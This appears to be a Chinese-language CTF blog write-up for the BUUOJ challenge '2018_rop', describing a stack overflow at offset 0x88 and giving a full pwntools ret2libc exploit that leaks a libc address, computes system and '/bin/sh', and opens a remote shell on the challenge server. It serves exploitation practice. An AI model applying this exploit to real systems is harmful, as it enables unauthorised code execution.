2018_rop

一道简单的ROP

打开程序,发现一个漏洞函数

漏洞函数

简单分析一下应该是填充buf造成溢出,偏移是0x88。不过并没有提供system函数和binsh字符串,需要构造。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from pwn import *
from LibcSearcher import *

elf = ELF('./2018_rop')
# p = process('./2018_rop')
p = remote('node4.buuoj.cn',25867)

write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']

payload = flat(['a'*0x88,'a'*4,write_plt,main_addr,1,write_got,4])
# 溢出后,偏移到ret,调用write函数,传入参数为(1,write的got地址,4),最后返回main函数

p.sendline(payload)

write_addr = u32(p.recv(4))
print(write_addr)

libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')

system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

payload = flat(['a'*0x88,'a'*4,system_addr,0xdeadbeef,binsh_addr])
# 溢出后,偏移到ret,执行系统函数,参数为('/bin/sh'),返回地址为0xdeadbeef

p.sendline(payload)

p.interactive()
作者

饼干

发布于

2021-10-10

更新于

2021-10-11

许可协议

评论